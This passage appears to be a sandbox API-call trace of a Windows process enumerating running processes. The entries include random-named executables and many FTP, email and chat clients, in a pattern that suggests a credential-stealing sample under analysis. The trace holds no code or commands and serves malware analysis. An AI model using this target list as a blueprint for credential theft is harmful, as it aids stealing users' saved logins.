th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.537] GetTickCount () returned 0x11f0607 [0096.537] GetCurrentThreadId () returned 0x42c [0096.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.537] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.538] GetTickCount () returned 0x11f0607 [0096.538] GetCurrentThreadId () returned 0x42c [0096.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.538] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x698, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="transactions-naturals.exe")) returned 1 [0096.539] GetTickCount () returned 0x11f0607 [0096.539] GetCurrentThreadId () returned 0x42c [0096.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.539] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera_intervals_organizational.exe")) returned 1 [0096.540] GetTickCount () returned 0x11f0607 [0096.540] GetCurrentThreadId () returned 0x42c [0096.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.540] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="adrian defence serbia.exe")) returned 1 [0096.541] GetTickCount () returned 0x11f0616 [0096.541] GetCurrentThreadId () returned 0x42c [0096.541] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.541] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbc promising ni.exe")) returned 1 [0096.542] GetTickCount () returned 0x11f0616 [0096.542] GetCurrentThreadId () returned 0x42c [0096.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.543] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="immigration_stem.exe")) returned 1 [0096.544] GetTickCount () returned 0x11f0616 [0096.544] GetCurrentThreadId () returned 0x42c [0096.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.544] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="clicks-yield.exe")) returned 1 [0096.545] GetTickCount () returned 0x11f0616 [0096.545] GetCurrentThreadId () returned 0x42c [0096.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.545] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x750, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="division.exe")) returned 1 [0096.546] GetTickCount () returned 0x11f0616 [0096.546] GetCurrentThreadId () returned 0x42c [0096.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.546] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="cet-pass.exe")) returned 1 [0096.547] GetTickCount () returned 0x11f0616 [0096.547] GetCurrentThreadId () returned 0x42c [0096.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.547] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="casino_bills.exe")) returned 1 [0096.548] GetTickCount () returned 0x11f0616 [0096.548] GetCurrentThreadId () returned 0x42c [0096.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.549] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="frame.exe")) returned 1 [0096.550] GetTickCount () returned 0x11f0616 [0096.550] GetCurrentThreadId () returned 0x42c [0096.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.550] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="framework.exe")) returned 1 [0096.551] GetTickCount () returned 0x11f0616 [0096.551] GetCurrentThreadId () returned 0x42c [0096.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.551] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="comments.exe")) returned 1 [0096.552] GetTickCount () returned 0x11f0616 [0096.552] GetCurrentThreadId () returned 0x42c [0096.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.552] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="zum.exe")) returned 1 [0096.553] GetTickCount () returned 0x11f0616 [0096.553] GetCurrentThreadId () returned 0x42c [0096.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.553] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="gore.exe")) returned 1 [0096.554] GetTickCount () returned 0x11f0616 [0096.554] GetCurrentThreadId () returned 0x42c [0096.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.555] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="analog.exe")) returned 1 [0096.556] GetTickCount () returned 0x11f0616 [0096.556] GetCurrentThreadId () returned 0x42c [0096.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.556] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="null.exe")) returned 1 [0096.557] GetTickCount () returned 0x11f0626 [0096.557] GetCurrentThreadId () returned 0x42c [0096.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.557] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="other.exe")) returned 1 [0096.558] GetTickCount () returned 0x11f0626 [0096.558] GetCurrentThreadId () returned 0x42c [0096.558] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.558] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="imagingboost.exe")) returned 1 [0096.559] GetTickCount () returned 0x11f0626 [0096.559] GetCurrentThreadId () returned 0x42c [0096.559] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.559] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="cups.exe")) returned 1 [0096.560] GetTickCount () returned 0x11f0626 [0096.560] GetCurrentThreadId () returned 0x42c [0096.560] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.560] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.561] GetTickCount () returned 0x11f0626 [0096.561] GetCurrentThreadId () returned 0x42c [0096.561] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.561] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.561] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.562] GetTickCount () returned 0x11f0626 [0096.562] GetCurrentThreadId () returned 0x42c [0096.562] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.562] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.563] GetTickCount () returned 0x11f0626 [0096.563] GetCurrentThreadId () returned 0x42c [0096.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.563] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.564] GetTickCount () returned 0x11f0626 [0096.564] GetCurrentThreadId () returned 0x42c [0096.564] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.564] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.564] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.565] GetTickCount () returned 0x11f0626 [0096.565] GetCurrentThreadId () returned 0x42c [0096.565] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.565] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.565] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.566] GetTickCount () returned 0x11f0626 [0096.566] GetCurrentThreadId () returned 0x42c [0096.566] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.566] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.567] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.567] GetTickCount () returned 0x11f0626 [0096.567] GetCurrentThreadId () returned 0x42c [0096.567] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.567] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.567] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.568] GetTickCount () returned 0x11f0626 [0096.568] GetCurrentThreadId () returned 0x42c [0096.568] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.568] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.568] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.569] GetTickCount () returned 0x11f0626 [0096.569] GetCurrentThreadId () returned 0x42c [0096.569] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.569] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.570] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.570] GetTickCount () returned 0x11f0626 [0096.570] GetCurrentThreadId () returned 0x42c [0096.570] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.571] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.571] GetTickCount () returned 0x11f0626 [0096.571] GetCurrentThreadId () returned 0x42c [0096.571] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.571] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.572] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.572] GetTickCount () returned 0x11f0636 [0096.573] GetCurrentThreadId () returned 0x42c [0096.573] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.573] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.573] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0096.573] GetTickCount () returned 0x11f0636 [0096.574] GetCurrentThreadId () returned 0x42c [0096.574] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.574] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.574] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0096.575] GetTickCount () returned 0x11f0636 [0096.575] GetCurrentThreadId () returned 0x42c [0096.575] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.575] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.575] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0096.576] GetTickCount () returned 0x11f0636 [0096.576] GetCurrentThreadId () returned 0x42c [0096.576] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.576] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.576] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0096.576] GetTickCount () returned 0x11f0636 [0096.577] GetCurrentThreadId () returned 0x42c [0096.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.577] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0096.577] GetTickCount () returned 0x11f0636 [0096.577] GetCurrentThreadId () returned 0x42c [0096.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.578] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0096.578] GetTickCount () returned 0x11f0636 [0096.578] GetCurrentThreadId () returned 0x42c [0096.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.579] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0096.580] GetTickCount () returned 0x11f0636 [0096.580] GetCurrentThreadId () returned 0x42c [0096.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.580] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0096.581] GetTickCount () returned 0x11f0636 [0096.581] GetCurrentThreadId () returned 0x42c [0096.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.581] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0096.583] GetTickCount () returned 0x11f0636 [0096.583] GetCurrentThreadId () returned 0x42c [0096.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.583] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0096.584] GetTickCount () returned 0x11f0636 [0096.584] GetCurrentThreadId () returned 0x42c [0096.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.584] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0096.585] GetTickCount () returned 0x11f0636 [0096.585] GetCurrentThreadId () returned 0x42c [0096.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.586] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 